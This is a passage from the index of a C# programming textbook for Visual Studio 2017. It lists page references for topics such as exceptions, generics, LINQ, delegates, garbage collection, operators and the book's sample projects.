quick reference, 156
StackOverflowException, 344
throwing
catch handler, 151–153
example of, 156
finally blocks, 154–155
throw exceptions, 153–154
throw statement, 149–153
unhandled, 135–136
verifying disposal after, 333–334
Visual Studio debugger settings, 148
exception-safe disposal, 322–323, 326–328, 335
ExceptWith method, 421
exclamation mark (!)
inequality (!=) operator, 96, 99, 112, 510
NOT (!) operator, 96
Execute method, 675, 676–677
exiting loops
break statement, 124
continue statement, 124
ExitReadLock method, 595, 609
ExitWriteLock method, 595, 609
explicit conversions, 517
explicit interface implementation, 293–295
explicit keyword, 518, 522
expression-bodied methods, 64–65, 93
expressions. See also IEnumerable interface
Boolean, 95–96
creating, 112
in if statements, 99–100
overview, 95–96
checked/unchecked, 146–148
lambda expressions
anonymous methods and, 426–427
defined, 423–424
delegates and, 464
features of, 426
forms of, 425–426
syntax, 424–425
LINQ query expressions
data aggregation, 485–487
data filtering, 484–485, 501
data grouping, 485–487, 501
data joins, 487–488, 502
data ordering, 485–487, 501
data selection, 482–484, 501
deferred evaluation, 497–500
examples of, 480–482
order of, 491
overview, 479–480
query operators, 489–491
quick reference, 501–502
Tree<TItem> objects and, 491–497
properties in, 344
quick reference, 59
Extensible Application Markup Language. See XAML (Extensible Application Markup Language)
Extensible Markup Language (XML), special characters in, 109
extension, interface, 292
extension methods, declaring, 283–287, 288
ExtensionMethod project, 285–287
Extract Method Wizard, 78
extracting methods, 78
F
factorial method, 83–84
Factorial project, 82–84
fall-through (switch statements), 109
fast Fourier transform (FFT), 602
faulted tasks
continuations with, 563–564
Faulted task status, 557
Feedback element (CustomerVoiceCommands.xml), 689
FFT (fast Fourier transform), 602
fields
naming conventions, 343–344
public versus private, 162
static
accessing, 181
creating, 175, 181
shared, 174–175
File menu commands, New, 4
FileOpenPicker class, 581
FileProcessor class, 317
files
App.config, 8
AppStyles.xaml, 646
audit-nnnnnn.xml, 458
.csproj format, 41
CustomerVoiceCommands.xml, 687–690
graphical application
App.xaml.cs file, 28–30
MainPage.xaml.cs, 27–28
mscorlib.dll, 17
Package.appxmanifest, 614
Properties, 7
.sln format, 41
stdarg.h, 258
VCD (voice-command definition) files, 687–690
FillList method, 443
filtering
data, 484–485, 501
exceptions, 138–142
finalization, 320
Finalize method, 318
finally blocks, 154–155, 156, 318, 322
Find and Replace command (Edit menu), 43
Find method, 423–425, 433, 451
FindAll method, 423
findByNameClick method, 375
findByPhoneNumberClick method, 376
FindLast method, 423
FindValueAsync method, 582–583
float data type, 39, 40
float keyword, 215
folders
Documents, 5
References, 7–8
For method
syntax, 565
when to use, 545–546
forcing garbage collection, 320, 335
foreach statement
arrays, iterating through, 234–235, 252
canceling, 557–558
collections, iterating through, 433, 448
Dictionary<TKey, TValue>, 419
LinkedList<T> class, 415
List<T> class, 413
Stack<T> class, 417–418
ForEach<T> method, 546, 565
FormatException, 134–135
forms. See Customers application
forward slash (/)
compound division (/=) operator, 116
division (/) operator, 47
freachable queue, 320–321
"free format" languages, 36
from operator, 489, 501
frozen applications, 580
Func delegate, 451–452
Func type, 676
Func<T, …> delegates, 452
function pointers, 451
G
garbage collection. See also destructors
advantages of, 318–320
finalization, 320
forcing, 320, 335
freachable queue, 320–321
how it works, 320–321
object lifetimes and, 319
overview, 189–190
quick reference, 335
resource management
disposal methods, 321–322
Dispose method, 324–326
exception-safe disposal, 322–323, 326–328, 335
IDisposable interface, 324, 328–330
preventing objects being disposed of more than once, 330–332
thread safety, 332–333
using statements, 323–324, 335
verifying disposal after exception, 333–334
when to use, 321
GarbageCollectionDemo project, 326–333
GC.Collect method, 320, 335
GC.SuppressFinalize method, 331
GDI (Graphics Device Interface) libraries, 33
generalized classes
creating with generics, 384–387
creating with object type, 381–384
vs. generics, 387
Generate Method Stub Wizard, 74–77, 93
generateGraphData method, 534, 541–543, 547, 554, 559
generateGraphDataAsync method, 576–577
generateResult method, 580
Generic namespace, 386–387, 411
generics
classes
binary tree class, creating, 391–399
binary tree theory, 388–390
System.IComparable interface, 391–393
System.IComparable<T> interface, 391–393
constraints, 387, 408
vs. generalized classes, 387
generalized classes, creating, 384–387
interfaces
contravariance, 406–408, 409
covariance, 404–405, 409
variance, 402–404
methods
calling, 409
creating, 399–400, 408
InsertIntoTree, 400–402
purpose of, 384–387
quick reference, 408–409
System.Collections.Generic namespace, 386
gestures, 612–613
get accessor method
indexers, 368–369, 379
interface properties, 348–349
properties, 342–343
GetCachedValue method, 583
GetCustomer method, 721
GetCustomers method, 721, 723
GetEnumerator method, 436, 444, 446
GetHashCode method, 406, 510, 515
global methods, lack of support for, 62
globally unique identifiers (GUIDs), 741
goto statement, 109
GraphDemo project
asynchronous methods, 575–577
parallelism
implementing, 532–538
Parallel class, 547–549
task cancellation, 553–557, 560–561
graphical applications, creating in Visual Studio 2017, 18–27, 34
adding code to, 30–32
App.xaml.cs file, 28–30
building and running, 25–26, 34
Button control, 24–25
MainPage.xaml.cs file, 27–28
pages in, 21
TextBlock control, 21–24
views of, 18
WPF App template, 33
Graphics Device Interface (GDI) libraries, 33
greater than (>) operator, 96, 99, 112
greater than or equal to (>=) operator, 96, 99, 112
Grid controls, 655
adapted layout with Visual State Manager, 640–643
background, 647–648
scalable user interface with, 619–620
tabular layout with, 630–639
group by operator, 489, 501
GroupBy method, 486, 495, 501
grouping data, 485–487, 501
GUIDs (globally unique identifiers), 741
H
Hand class, 430
Handle method, 562, 565
handling exceptions. See exceptions
HashSet<T> class, 412
Haskell, 423–424
HasValue property, 192
heap
boxing and, 199–200, 207
purpose of, 196–198
storing data on, 198–199
unboxing, 200–201
Hello World console application. See TestHello project
hexadecimal notation, 364
hierarchies, inheritance, 137
hill-climbing algorithm, 528–529
HTTP DELETE requests, 733
HTTP POST requests, 733
HTTP PUT requests, 733
Hungarian notation, 38, 291
hyphen (-)
compound subtraction (-=) operator, 116, 455, 467, 476
decrement (--) operator, 56–57, 59, 116, 146, 508–509
subtraction (-) operator, 47
I
IAsyncResult design pattern, 584–585
IColor interface, 296–304
IColor.SetColor method, 300, 302
ICommand interface, 675–678, 701
IComparable interface, 290–291, 391–393
IComparable<Employee> interface, 492
IComparable<T> interface, 391–393
IComparer interface, 406
IComparer<T> interface, 406
idempotency, REST web services and, 733–741
identifiers
constantExpression, 107–108
defined, 36
syntax of, 36
table of, 37
IDisposable interface, 324, 328–330
IDisposable.Dispose method, 440
IDraw interface, 296–304
IDraw.Draw method, 299, 301
IDraw.SetLocation method, 299
IEnumerable interface, 435, 436, 441–443. See also LINQ (Language-Integrated Query)
IEnumerable<T> interface, 405
IEnumerator<T> interface, 436
if statements
blocks, 100–101
cascading, 101–106
common errors in, 100
if…else, 203
syntax, 99–100, 112–113
when to use, 99
ILandBound interface, 291–292
Implement Interface Wizard, 292
implicit conversions, 517
implicit interface implementation, 291–292
implicit keyword, 518, 522
implicitly typed arrays, 232–233
implicitly typed local variables, 57–58
in keyword, 407, 409
increment (++) operator, 56–57, 59, 116
checked expressions, 146
declaring, 508–509
incrementing variables, 56–57, 59, 116
indexers
accessor methods, 368–369
arrays compared to, 369
in classes or structures, 379
creating, 366–368, 378
defined, 363
explicit interface implementation, 372, 379
in interfaces, 371–372, 379
properties and, 370–371
quick reference, 378–379
read-only, 369
in Windows applications, 372–378
write-only, 369
Indexers project, 372–378
IndexOf method, 374
IndexOutOfRangeException, 233, 563
inequality (!=) operator, 96, 99, 112, 510
infinite values, 49
information hiding. See encapsulation
inheritance. See also interfaces
class assignment, 271–273
declaring, 268–269, 288
defined, 267–268
exceptions, 137
interface extension, 292
method declarations, 270–271, 288
extension methods, 283–287, 288
method signatures, 273
new methods, 273–274
override methods, 275–276, 288
virtual methods, 274–275, 277, 288
polymorphism, 277
protected access, 278–283
quick reference, 288
System.Object root class, 270
System.ValueType abstract class, 269
Windows Runtime compatibility, 311–313
initializing
arrays, 231–232, 252
collections, 422–423
objects, 356–358, 361
structure variables, 227
structures, 219–223
variables, 189–190, 441
initiateTasks method, 552
InnerException property, 141
INotifyPropertyChanged interface, 665–668, 700
Insert method, 394–395, 413, 432
InsertIntoTree method, 400–402
InstallCommandDefinitionsFromStorageFileAsync method, 691
installing packages, 70
instance methods, 170
instantiating
arrays, 230–231, 252
delegates, 475
int data type
arithmetic operators and, 49–54
in array arguments, 256–257
binary values
displaying, 365
manipulating, 365–366
storing, 364
checked versus unchecked arithmetic, 144–145
converting double type to, 517
converting strings to, 47, 59
converting to double, 517
minimum/maximum value of, 144
overview, 40
in parameter arrays, 257–258
uint (unsigned int), 364
int keyword, 215, 398
Int32 structure, 214
Int32.Parse method, 47, 59
Int64 structure, 214
IntBits structure, 367–368
IntelliSense icons, 11
interface keyword, 290, 314
interface properties
declaring, 348–349, 361
implementing, 349
interfaces
defining, 290–291, 296–304, 314
extension, 292
generic
contravariance, 406–408, 409
covariance, 404–405, 409
variance, 402–404
IColor, 296–304
ICommand, 675–678, 701
IComparable, 290–291
IComparer, 406
IComparer<T>, 406
IDisposable, 324, 328–330
IDraw, 296–304
IEnumerable, 435, 436, 441–443
IEnumerable<T>, 405
IEnumerator<T>, 436
ILandBound, 291–292
implementing, 314
explicit implementation, 293–295
Implement Interface Wizard, 292
implicit implementation, 291–292
indexers in, 371–372, 379
INotifyPropertyChanged, 665–668, 700
IRawInt, 371–372
IRetrieveWrapper<T>, 404–405
IScreenPosition, 348–349
IStoreWrapper<T>, 404–405
IWrapper, 403–404
multiple, 293
naming conventions, 291
overview, 289–290
properties
declaring, 348–349, 361
implementing, 349
quick reference, 314
referencing classes through, 292–293
restrictions on, 295–296
System.IComparable, 391–393
System.IComparable<T> interface, 391–393
interpolation, string, 48
Intersect method, 491
IntersectWith method, 421–422
InvalidCastException, 201, 384, 404
InvalidOperationException, 151–152, 153, 413, 440
invalidPercentage method, 97
Invoke method, 546, 565
invoking methods. See calling methods
IRawInt interface, 371–372
IRetrieveWrapper<T> interface, 404–405
is operator, 202, 207
IsAdding property (ViewModel), 735
IsAddingOrEditing property (ViewModel), 735, 745
IsAtEnd property (ViewModel), 680
IsAtStart property (ViewModel), 680
IsBrowsing property (ViewModel), 734–735
_isBusy field, 746
IsBusy property (ViewModel), 746
IsCardAlreadyDealt method, 244, 430
IScreenPosition interface, 348–349
IsEditing property (ViewModel), 735
IsNullOrEmpty method, 376
IsProperSubsetOf method, 421
IsProperSupersetOf method, 421
IsSubsetOf method, 421
IsSuitEmpty method, 243–244
IsSupersetOf method, 421
IStoreWrapper<T> interface, 404–405
iteration
do statements
blocks, 124
example of, 132
stepping through, 127–131
syntax, 124
writing, 125–127
exiting
break statement, 124
continue statement, 124
Parallel.For method, 557–558
quick reference, 132
for statements
blocks, 122
multiple initializations and updates in loop, 123
scope, 123
syntax, 121–122
through arrays, 233–235, 252, 557–558
through collections, 433
Dictionary<TKey, TValue>, 419
LinkedList<T> class, 415–416
List<T> class, 414
parallelized query over simple collection, 585–590
SortedDictionary<TKey, TValue>, 420
while statements
blocks, 118
example of, 132
nesting, 117
sentinel variable, 117
syntax, 117
terminating, 117
writing, 118–121
iterators
defined, 443
defining enumerators with, 445–447
simple example, 443–445
IWrapper interface, 403–404
J
jagged arrays, 239–240, 253
Join method, 488, 502
join operator, 490, 502
joining data, 487–488, 502
K
KeyValuePair<TKey, TValue> class, 420
keywords. See also operators; statements
abstract, 306, 313, 314
async, 571–572, 608
base, 270, 275, 288
bool, 215
byte, 215
case, 107
checked, 144–145, 156
expressions, 146–148
statements, 145
class, 160–161
const, 175
decimal, 215
default, 107, 441
defined, 36
delegate, 454, 475
double, 215
enum, 210, 227
explicit, 518, 522
float, 215
implicit, 518, 522
in, 407, 409
int, 215, 398
interface, 290, 314
long, 215
namespace, 15
new, 232, 315
array creation, 230, 252
class creation, 161, 179
delegate creation, 450–451, 475
method declarations, 273–274, 313
object creation, 197, 271
objects, 271
object, 199, 215
operator, 504, 518
out, 194–195, 207, 405, 409
override, 275–276, 288, 307, 313
params, 256, 258, 731
partial, 166
private, 65, 162–163, 278, 313
protected, 278, 313
public, 162–163, 164, 278, 313, 505, 522
ref, 193–194, 207
sbyte, 215
sealed, 306–307, 313, 314
short, 215
static, 522
StaticResource, 647
string, 184, 215
struct, 216, 227
table of, 36–37
this, 284, 288, 368, 378
uint, 215
ulong, 215
unchecked, 144–145
expressions, 146–148
statements, 145
unsafe, 205–206
ushort, 215
value, 369
var, 54, 62, 179, 484
virtual, 275, 288, 313
void, 63
when, 138–142
where, 401, 408, 489, 501
yield, 444, 448
L
lambda (=>) operator, 64, 425
lambda calculus, 425
lambda expressions
anonymous methods and, 426–427
defined, 423–424
delegates and, 464
features of, 426
forms of, 425–426
syntax, 424–425
Land method, 279
language interoperability, operators and, 507
Language-Integrated Query. See LINQ (Language-Integrated Query)
left-shift (<<) operator, 365
length of arrays, finding, 233, 252
Length property (arrays), 233, 252
less than (<) operator, 96, 99, 112
less than or equal to (<=) operator, 96, 99, 112
libraries
assemblies
core, 17
defined, 7–8
namespaces and, 17
references for, 17
class, 391
GDI (Graphics Device Interface), 33
life cycle of UWP applications, 613
LinearGradientBrush, 659
LinkedList<T> class, 412, 415–416
LINQ (Language-Integrated Query). See also IEnumerable interface
data aggregation, 485–487
data filtering, 484–485, 501
data grouping, 485–487, 501
data joins, 487–488, 502
data ordering, 485–487, 501
data selection, 482–484, 501
deferred evaluation, 497–500
defined, 479–480
examples of, 480–482
order of expressions, 491
PLINQ (Parallel LINQ)
overview, 585
parallelized query over simple collection, 585–587
parallelized query that joins two collections, 587–590
query cancellation, 587–590
quick reference, 608
query operators, 489–491
quick reference, 501–502
Tree<TItem> objects and, 491–497
Linq namespace, 489
List<T> class, 412, 413–416
ListenFor element (CustomerVoiceCommands.xml), 689
literals, enumeration
names, 210
values, 211
local scope, 71
local variables
implicitly typed, 57–58
unassigned, 40
lock statement, 332–333, 593, 609
locking data, 593–594, 607, 609
logical operators, 97
logical AND (&&), 97
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
logical OR (||)
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
long data type, 40
long keyword, 215
loops
do
blocks, 124
example of, 132
stepping through, 127–131
syntax, 124
writing, 125–127
exiting
break statement, 124
continue statement, 124
for
blocks, 122
Cards project, 247–248
iteration through arrays, 233–235
multiple initializations and updates in loop, 123
scope, 123
syntax, 121–122
foreach, 234–235, 252, 433
canceling, 557–558
Dictionary<TKey, TValue>, 419
LinkedList<T> class, 415
List<T> class, 413
Stack<T> class, 417–418
Parallel.For method, 557–558
quick reference, 132
while
blocks, 118
example of, 132
nesting, 117
sentinel variable, 117
syntax, 117
terminating, 117
writing, 118–121
&lt; entity, 109
M
MachineOverheating event, 466, 467
macros, varargs, 258
Main method, 35
array parameters, 236
asynchronous operations and, 573
BinaryTreeTest project, 398–399, 402
console applications, 8–10
MainPage.xaml files, 27–28, 639
MainPage.xaml.cs file, 27–28
Mammal class
base-class constructors, 270
declaring, 268–269
managed code, 226
managed execution environment, 226
Manifest Designer, 614
ManualResetEventSlim class, 594, 609
Math class
PI field, 160, 175
Sqrt method, 171, 173–174
mathematical operators. See arithmetic operators
MathsOperators project
creating, 49–54
exception handling, 139–142, 149–151
MaxValue property (int data type), 144
memory
allocation, asynchronous methods and, 582–583
boxing, 199–200, 207
garbage collection, 189–190, 324. See also destructors
advantages of, 318–320
finalization, 320
forcing, 320
freachable queue, 320–321
how it works, 320–321
object lifetimes and, 319
when to use, 321
heap
purpose of, 196–198
storing data on, 198–199
OutOfMemoryException, 198
pointers, 204–206
resource management, 321–324
disposal methods, 321–322
Dispose method, 324–326
exception-safe disposal, 322–323, 326–328, 335
IDisposable interface, 324, 328–330
preventing objects being disposed of more than once, 330–332
thread safety, 332–333
using statements, 323–324, 335
verifying disposal after exception, 333–334
stack
purpose of, 196–198
storing data on, 198–199
unboxing, 200–201
MessageDialog object, 580
methods. See also individual method names
abstract, 306
accessor
indexers, 368
properties, 342–343
adapters, 464–465
anonymous, 426–427
asynchronous
common errors with, 579–580
Main method and, 573
overview, 567, 568
problem solved by, 568–577
return values, 578–579
scalability and, 568
Windows Runtime APIs and, 580–582
calling, 93
generics, 409
multiple return values, 68–70, 93
from other objects, 68
syntax, 65–68
constructors
base-class, 270–271, 288
calling, 181
declaring, 163–164, 180
default, 164
order of, 165
overloading, 164–165
public versus private, 164
declaring, 62–63, 93
extension methods, 283–287, 288
new methods, 273–274
override methods, 275–276, 288
virtual methods, 274–275, 277, 288
deconstructors, 172–173
defined, 61
defining, 313
delegates
Action<T, …>, 452
adding methods to, 455
in automated factory scenario, 453–456
declaring, 450–451, 454, 456–464, 475
defined, 450
examples of, 451–452
Func, 451–452
Func<T, …>, 452
function pointers compared to, 451
instantiating, 475
invoking, 454–455, 475
lambda expressions and, 464
method adapters, 464–465
overview, 450–451
performCalculationDelegate, 450–451
quick reference, 475
removing methods from, 455
destructors
calling, 335
restrictions on, 317–318
writing, 316–318, 335
expression-bodied, 64–65, 93
extracting, 78
generics
calling, 409
creating, 399–400, 408
InsertIntoTree, 400–402
global, 62
instance, 170
length of, 65
naming conventions, 62
nesting, 81–84, 94
overloading, 72–73, 255–256
override
declaring, 275–276, 288
sealed override, 307
parameters
defining, 62
named arguments, 86–92, 94
optional, 84–86, 87–92, 94
public versus private, 162
quick reference, 93–94
refactoring, 78
replacing with properties, 349–353
returning values from, 93
method declarations, 63–64
multiple return values, 68–70
return types, 235–236
void keyword, 63
scope
class, 72
local, 71
overview, 71
sealed, 307
serializing, 607
signatures, 273
static, 173–174, 181
stepping through, 78–81, 94
syntax, 62–63
WriteLine, 73
writing, 73–77
Methods project
expression-bodied methods, 64–65
method calls, 67
multiple return values, 68–70
Microsoft Patterns & Practices Git repository, 568
Microsoft Visual Studio 2017. See Visual Studio 2017
Min method, 256–257
MinValue property (int data type), 144
Model-View-ViewModel (MVVM) pattern, 657–658
modulus operators
compound modulus (%=), 116
modulus (%), 48
Moore, Gordon E., 526
Moore's Law, 526
MoveNext method, 436, 439, 448
mscorlib.dll file, 17
multicore processors, 526–527. See also tasks
multidimensional arrays, 238, 253, 258
multiple interfaces, 293
multiple return values, calling, 68–70, 93
multiplication (*) operator, 47
multiplyValues method, 53
multitasking
advantages of, 525–526
multicore processors, 526–527
.NET Framework and, 527
tasks
abstracting, 545–549
canceling, 551–561, 566
continuations, 530–531, 563–564, 565
CPU bottlenecks, 533–545
creating, 529, 564
exception handling, 562–563, 565
faulted, 557, 563–564
Parallel class, 545–551
parallelism, 531–538, 545–551, 565
quick reference, 564–566
running, 530, 564
synchronizing, 531
Task class, 528–529
threads, 528–529
waiting for, 531, 564–565
MVVM (Model-View-ViewModel) pattern, 657–658
N
Name structure, 373
named arguments
interfaces, 291
passing, 86–87, 94
resolving ambiguities with, 87–92
nameof operator, 668–669
namespace keyword, 15
namespaces
assemblies and, 17
bringing into scope, 15
Collections, 412
declaring, 616
defining classes in, 14–15
Generic, 386–387, 411
Linq, 489
longhand names, 16
Numerics, 511
Tasks, 527
Threading, 528, 594
naming conventions
camelCase, 163
case sensitivity, 36
fields, 343–344
methods, 62
operators, 505
PascalCase, 163
properties, 343–344
reserved words, 36–37
variables, 38
NaN (not a number), 49
narrowing conversions, 517
native code, 226
Navigate element (CustomerVoiceCommands.xml), 689
Navigate method, 693, 697
NavigationArgs class, 698
NegInt32 class, 283–284
nesting
if statements, 101–106
methods, 81–84, 94
while statements, 117
.NET Core template, 4
.NET Framework. See also multitasking
CLR (common language runtime), 85
IAsyncResult design pattern, 584–585
Windows Runtime, compatibility with, 226, 311
New command (File menu), 4
new keyword, 232, 315
array creation, 230, 252
class creation, 161, 179
delegate creation, 450–451, 475
method declarations, 273–274, 313
object creation, 197, 271
New Project dialog box, 4–5, 18, 34
New Universal Windows Project dialog box, 615
Next buttons, adding to forms, 682–685
Next method, 231, 680–681
NextCustomer command, 679–682
NextCustomer property (ViewModel), 681–682
NodeData property (Tree<TItem> class), 393–394
nodes, binary tree, 388
NOT (!) operator, 96
NOT (~) operator, 365
NotImplementedException, 243, 299, 439
NotOnCanceled option (ContinueWith method), 531
NotOnFaulted option (ContinueWith method), 531
NotOnRanToCompletion option (ContinueWith method), 531
NuGet Package Manager, 70, 727
null strings, 376
null values
null-conditional (?) operator, 190–191, 207
overview, 189–190
testing for, 190–191
nullable types
enumerations, 210
structures, 218
nullable values
overview, 191–192
properties of, 192–193
null-conditional (?) operator, 190–191, 207
NullReferenceException, 190
NumCircles field (Circle class), 174–175
numeric values
converting strings to, 47
infinite values, 49
primitive data types
displaying values of, 41–46
table of, 40
specifying, 39–40
Numerics namespace, 511
O
Object class, 199, 270
object initializers, 357
object keyword, 199, 215
ObjectComparer object, 406
objectCount field (Point class), 177–178
ObjectCount method, 178
Object.Finalize method, 318
objects. See also classes
calling methods from, 68
CancellationToken, 551–552, 590
CancellationTokenSource, 590, 610
cardsInSuit, 428
casting, 202
InvalidCastException, 201
is operator, 202
as operator, 202–203
quick reference, 207
switch statement, 203–204
classes compared to, 161
creating, 315–316
deconstructing, 172–173
destroying, 316
Dispatcher, 571
initializing with properties, 356–358, 361
lifetime of, 319
MessageDialog, 580
ObjectComparer, 406
passing by reference, 189
speechRecognitionResult, 691
StopWatch, 534
Task
abstracting, 545–549
canceling, 551–561, 566
continuations, 530–531, 563–564, 565
CPU bottlenecks, identifying, 533–545
creating, 529, 564
exception handling, 562–563, 565
faulted, 557, 563–564
parallelism, 531–538, 545–551, 565
running, 530, 564
synchronizing, 531
waiting for, 531, 564–565
TaskCreationOptions, 530
ViewModel, 734–740
adding commands to, 675–685
adding/editing data with, 731
creating, 671–675
error reporting, 743–746
MVVM (Model-View-ViewModel) pattern, 657–658
UI updates, 746–748
VoiceCommandActivatedEventArgs, 691
WriteableBitmap, 532, 582
0b0 prefix, 364, 378
on clause, 491
OnActivated method, 691–692, 697
OnLaunched method, 690
OnlyOnCanceled option (ContinueWith method), 531
OnlyOnFaulted option (ContinueWith method), 531
OnlyOnRanToCompletion option (ContinueWith method), 531
OnNavigatedTo method, 694, 699
OnPropertyChanged method, 666–668, 679
openFileClick method, 119
OperationCanceledException, 559–560, 596
operator keyword, 504, 518
operators
arithmetic
applying to int values, 49–54
associativity, 54–56
data types and, 47–49
overview of, 47
precedence, 54, 59
prefix and postfix forms, 56–57
as, 202–203, 207
assignment (=)
associativity, 54–56
overview, 39
associativity, 98–99, 503
await, 555, 564, 572–574, 608
binary, 504
bitwise, 365–366
Boolean
associativity, 98–99
conditional logical operators, 97
defined, 96
equality operators, 96
precedence, 98–99
relational operators, 96
short-circuiting, 97–98
comparing in structures and classes, 509–510
compound assignment
associativity, 116
delegates and, 455
evaluation of, 507–508
events and, 466, 476
examples of, 132
overview, 115–116
precedence, 116
table of, 116
constraints, 504
conversion
built-in, 517
narrowing conversions, 517
overview, 516–517
user-defined, 518
widening conversions, 517
writing, 519–521, 522
decrement (--), 56–57, 59, 116, 508–509
dot (.), 316
equality (==), 96, 99, 112, 510
equals, 490
from, 489, 501
group by, 489, 501
implementing, 511–516, 522
increment (++), 56–57, 59, 116, 508–509
is, 202, 207
join, 490, 502
lambda (=>), 425
language interoperability and, 507
nameof, 668–669
naming conventions, 505
NOT (!), 96
null-conditional (?), 190–191, 207
orderby, 489, 501
overloading
constraints, 504
syntax, 504–505
pairs of, 510
precedence, 98–99, 503
prefix, 56–57
public, 505
query, 489–491
quick reference, 59, 522
select, 489, 501
static, 505
structures and, 216
symmetric, 506–507, 519
unary, 56, 504
where, 489, 501
optional parameters, 263–265
defining, 86, 94
resolving ambiguities with, 87–92
when to use, 84–86
optMethod method, 86–88
OR operators
OR (|), 365
logical OR (||)
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
Order Placed dialog box, 458
OrderBy method, 485–486, 501
orderby operator, 489, 501
OrderByDescending method, 486
ordering data, 485–487, 501
OrdersInMemory class, 588
out keyword, 194–195, 207, 405, 409
out parameters, 194–195, 207
OutOfMemoryException, 198, 238, 533
Output window, 12
OverflowException, 135, 144–149, 517
checked expressions, 146–148
checked statements, 145
overloading
constructors, 164–165
methods, 72–73, 255–256
operators
constraints, 504
syntax, 504–505
overpartitioning, 529
override keyword, 275–276, 288, 307, 313
override methods
declaring, 275–276, 288
sealed override, 307
overriding operators
equality (==) operator, 510
inequality (!=) operator, 510
operator precedence, 54, 59
P
Pack class, 242–243, 428
package managers, NuGet, 70, 727
Package.appxmanifest file, 614
packages
System.ValueType, 173
ValueTuple, 70
pairs, operator, 510
Parallel class
abstracting classes with, 545–549
ForEach<T> method, 546, 565
Invoke method, 546, 565
For method, 545–546, 565
when to use, 549–551
Parallel LINQ. See PLINQ (Parallel LINQ)
Parallel.For method
canceling, 557–558
syntax, 565
when to use, 545–546
Parallel.ForEach<T> method, 546, 565
Parallel.Invoke method, 546
parallelism
CPU bottlenecks, identifying, 533–545
implementing, 531–538, 565
Parallel class, 545–551
PLINQ (Parallel LINQ)
overview, 585
parallelized query over simple collection, 585–587
parallelized query that joins two collections, 587–590
query cancellation, 587–590
ParallelLoop project, 549
ParallelPI method, 603–604, 607
ParallelTest method, 592–593
ParamArray project, 260–263, 264–265
parameter arrays
advantages of, 255
declaring, 257–259, 266
int data type in, 257–258
optional parameters compared to, 263–265
params object[], 259–260
priority of, 259
quick reference, 266
Sum method used with, 260–263
parameters (method), 62
arrays as, 235–236
defining, 62
named arguments, 94
passing, 86–87
resolving ambiguities with, 87–92
optional, 263–265
defining, 86, 94
resolving ambiguities with, 87–92
when to use, 84–86
out, 194–195, 207
parameter arrays
advantages of, 255
declaring, 257–259, 266
int data type in, 257–258
optional parameters compared to, 263–265
params object[], 259–260
priority of, 259
quick reference, 266
Sum method used with, 260–263
ref
creating, 193–194, 207
overview, 193
Parameters project, 195–196
Parameters project, 186–188, 195–196
params arrays. See parameter arrays
params keyword, 256, 258, 731
params object[], 259–260
parentheses ()
in if statements, 100
in method calls, 62, 66
precedence override, 54
parse method, 47
partial classes, 165–172
partial keyword, 166
PascalCase naming scheme, 163
Pass class
Reference method, 188
Value method, 186–187
passing
arrays, 235–236
named arguments, 86–87, 94
by reference, 189
Peek Definition window, 90
percent sign (%)
compound modulus (%=) operator, 116
modulus (%) operator, 48
Performance Explorer, identifying CPU bottlenecks with, 533–545
performCalculationDelegate, 450–451
period (.)
dot notation, 284
dot operator, 316
phone book project, 372–378
PhoneNumber structure, 373–375
PhraseTopic element (CustomerVoiceCommands.xml), 688, 689
pi, calculating
with parallel tasks, 603–605
with single thread, 600–603
PI field (Math class), 160, 175
PickMultipleFilesAsync method, 581
PickSingleFileAsync method, 581
pipe (|)
logical OR (||) operator
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
OR (|) operator, 365
PlayingCard class, 241–242, 429–430
PLINQ (Parallel LINQ)
overview, 585
parallelized query over simple collection, 585–587
parallelized query that joins two collections, 587–590
query cancellation, 587–590
quick reference, 608
PLINQ project, 586–587
plotButton_Click method, 533, 545, 554–555, 575–576, 577
plotXY method, 535
plus sign (+)
addition (+) operator, 47
compound addition (+=) operator, 116, 466, 476
increment (++) operator, 56–57, 59, 116, 146, 508–509
Point class
declaring, 167–171
deconstructor, 172
objectCount field, 177–178
ObjectCount method, 178
pointers
function, 451
memory, 204–206
pointsList collection, 605
Polygon class, 358–359
polymorphism
virtual methods and, 277
Windows Runtime compatibility, 311–313
Pop method, 411–412
populating arrays, 231–232
POST requests, 733
PostCustomer method, 721, 740, 741
PostCustomerAsync method, 740
PostCustomerWithHttpMessagesAsync method, 742
postfix form of operator, 56–57
precedence of operators, 503
Boolean operators, 98–99
compound assignment operators, 116
controlling, 54, 59
table of, 98–99
predicates, 423–425
prefix form of operator, 56–57
Previous buttons, adding to forms, 682–685
Previous method, 680–681
PreviousCustomer command, 679–682
PreviousCustomer property (ViewModel), 681–682
primary operators
associativity, 98
precedence, 98
primitive data types
displaying values of, 41–46
table of, 40
PrimitiveDataTypes project, 41–46
privacy, data, 185–186
private classes, 162–163
private constructors, 164
private fields, 162
private keyword, 65, 162–163, 278, 313
ProcessData method, 235
processors, multicore, 526–527. See also tasks
Profiling Reports, 539–544
Program class, 187
ProgressRing control, 747
projects. See also AdventureWorksService project; Customers application
AuditService, 459
AutomaticProperties, 358–359
BinaryTree, 392–396, 445–447
BinaryTreeTest, 396–399
BuildTree, 400–402
CalculatePI, 600–603
Cards, 240–248
AddCardToHand method, 246
collection classes, 427–431
DealCardFromPack method, 243
dealClick method, 246
IsCardAlreadyDealt method, 244
IsSuitEmpty method, 243–244
for loop, 247–248
Pack class, 242–243
PlayingCard class, 241–242
randomCardSelector variable, 242
ToString method, 245
Value enumeration, 241
CheckoutService, 461–463
Classes, 166–172
ComplexNumbers, 511–514
Customers, 734–740
error reporting, 742–746
UI updates, 746–749
DailyRate
application logic, 73–74
method declarations, 74–77
optional parameters and named arguments, 88–92
stepping through, 78–81
DataTypes, 459
Delegates
delegates, 457–460
events, 470–475
DeliveryService, 459
DoStatement, 125–131
Drawing
abstract classes, 307–311
interfaces, 296–304
properties, 349–353
EnumeratorTest, 442–443
ExtensionMethod, 285–287
Factorial, 82–84
GarbageCollectionDemo, 326–333
GraphDemo
asynchronous methods, 575–577
parallelism, 532–538, 547–549
task cancellation, 553–557, 560–561
Indexers, 372–378
MathsOperators
creating, 49–54
exception handling, 139–142, 149–151
Methods
expression-bodied methods, 64–65
method calls, 67
multiple return values, 68–70
ParallelLoop, 549
ParamArray, 260–263, 264–265
Parameters, 186–188, 195–196
PLINQ, 586–587
PrimitiveDataTypes, 41–46
QueryBinaryTree, 491–497, 498–500
Selection, 102–106
StructsAndEnums, 212–214, 220–223, 224–225
SwitchStatement, 109–112
TestHello console application, 3–17
building and running, 11–14
files, 7–8
IntelliSense icons, 11
Main method, 8–10
